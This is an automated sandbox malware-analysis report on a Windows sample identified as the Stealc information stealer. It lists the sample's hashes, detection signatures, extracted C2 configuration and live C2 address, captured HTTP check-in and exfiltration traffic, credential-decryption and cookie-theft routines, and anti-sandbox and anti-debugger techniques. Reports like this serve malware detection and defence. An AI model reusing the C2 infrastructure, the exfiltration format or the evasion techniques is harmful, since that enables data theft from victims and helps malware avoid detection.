Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1542963
MD5:083803a310e16df3e21777d07a5be88a
SHA1:1a0a8d22d1e39395c4f98a5188ee91384ec54d6f
SHA256:4f3a31155f05af798afc16c664a7e4b364b9cd7f78d2c40f92ca25b1f9dc115b
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 420 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 083803A310E16DF3E21777D07A5BE88A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2208197213.00000000000D1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2167881887.0000000004A80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 420JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 420JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.d0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-27T01:22:05.157295+020020442431Malware Command and Control Activity Detected192.168.2.657121185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.d0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 44%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_000DC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000D7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_000D9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000D9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_000E8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000E38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000E4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_000DDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_000DE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_000DED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000E4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_000DBE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000E3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000D16D0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:57121 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 42 36 41 35 32 35 32 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 2d 2d 0d 0a Data Ascii: ------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="hwid"01FB6A525235574217965------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="build"puma------JJKFBFIJJECGCAAAFCBG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_000D4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKFBFIJJECGCAAAFCBGHost: 185.215.113.206Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 31 46 42 36 41 35 32 35 32 33 35 35 37 34 32 31 37 39 36 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4b 46 42 46 49 4a 4a 45 43 47 43 41 41 41 46 43 42 47 2d 2d 0d 0a Data Ascii: ------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="hwid"01FB6A525235574217965------JJKFBFIJJECGCAAAFCBGContent-Disposition: form-data; name="build"puma------JJKFBFIJJECGCAAAFCBG--
                Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/&u
                Source: file.exe, 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php/
                Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.php3u
                Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpk
                Source: file.exe, 00000000.00000002.2208889056.0000000000BB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/e2b1563c6670f193.phpt
                Source: file.exe, 00000000.00000002.2208889056.0000000000B78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A38040_2_004A3804
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0045608E0_2_0045608E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A60AA0_2_004A60AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049D9670_2_0049D967
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AB1D90_2_004AB1D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004791B50_2_004791B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003EC2CB0_2_003EC2CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004ACB690_2_004ACB69
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A4BC20_2_004A4BC2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049F40E0_2_0049F40E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003FB4660_2_003FB466
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0036A48B0_2_0036A48B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A35BE0_2_005A35BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A165F0_2_004A165F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004AE6310_2_004AE631
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 000D45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: ybzlaxoh ZLIB complexity 0.9951239753324267
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000E9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_000E3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\J0W1NQ2T.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.2208889056.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies;i
                Source: file.exeReversingLabs: Detection: 44%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1850368 > 1048576
                Source: file.exeStatic PE information: Raw size of ybzlaxoh is bigger than: 0x100000 < 0x19da00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ybzlaxoh:EW;gchetgti:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ybzlaxoh:EW;gchetgti:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cfa3c should be: 0x1d31a3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: ybzlaxoh
                Source: file.exeStatic PE information: section name: gchetgti
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BC053 push 58A12E30h; mov dword ptr [esp], esi0_2_004BC099
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BC053 push edx; mov dword ptr [esp], esi0_2_004BC147
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004BC053 push ebp; mov dword ptr [esp], esi0_2_004BC153
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057F872 push eax; mov dword ptr [esp], esi0_2_0057F88D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057F872 push ecx; mov dword ptr [esp], esp0_2_0057F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058787D push ebx; mov dword ptr [esp], esi0_2_005878EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EB035 push ecx; ret 0_2_000EB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 74E08F72h; mov dword ptr [esp], ebp0_2_004A3880
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 28287C9Fh; mov dword ptr [esp], esp0_2_004A3888
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 2A1488FBh; mov dword ptr [esp], ebx0_2_004A39A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push eax; mov dword ptr [esp], 2FD53D49h0_2_004A39A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push edi; mov dword ptr [esp], eax0_2_004A39AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push eax; mov dword ptr [esp], edi0_2_004A39D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 08ED1F5Dh; mov dword ptr [esp], ebx0_2_004A3A00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push edi; mov dword ptr [esp], ecx0_2_004A3A04
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push ebp; mov dword ptr [esp], esi0_2_004A3A98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push esi; mov dword ptr [esp], eax0_2_004A3AC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push eax; mov dword ptr [esp], ebx0_2_004A3BDB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 50B71DD4h; mov dword ptr [esp], edx0_2_004A3C0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push edx; mov dword ptr [esp], 610B2623h0_2_004A3C95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 5F43B6DEh; mov dword ptr [esp], eax0_2_004A3CD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push ebx; mov dword ptr [esp], 359347DDh0_2_004A3CDE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push esi; mov dword ptr [esp], ebp0_2_004A3D0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 7440EC22h; mov dword ptr [esp], esi0_2_004A3D61
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 6A2CF7C7h; mov dword ptr [esp], ebx0_2_004A3DAA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004A3804 push 5353A446h; mov dword ptr [esp], ecx0_2_004A3DD8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D5815 push esi; mov dword ptr [esp], ebx0_2_004D585A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053C8D5 push edx; mov dword ptr [esp], ebx0_2_0053C940
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005028CC push ebp; mov dword ptr [esp], 3FFE2E7Eh0_2_005028F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B58EC push ebx; mov dword ptr [esp], edi0_2_005B5967
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053E094 push 2C65E36Bh; mov dword ptr [esp], ebp0_2_0053E047
                Source: file.exeStatic PE information: section name: ybzlaxoh entropy: 7.954973653078467

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13609
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC6B0 second address: 4AC6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B25F9 second address: 4B2601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2601 second address: 4B2621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F95D47CFB2Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2621 second address: 4B2625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B2747 second address: 4B275A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F95D47CFB2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B53A3 second address: 4B53F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jnl 00007F95D5269628h 0x00000010 jp 00007F95D5269628h 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jg 00007F95D5269645h 0x00000021 mov eax, dword ptr [eax] 0x00000023 jng 00007F95D526962Eh 0x00000029 push esi 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B53F2 second address: 4B5404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5404 second address: 4B5408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
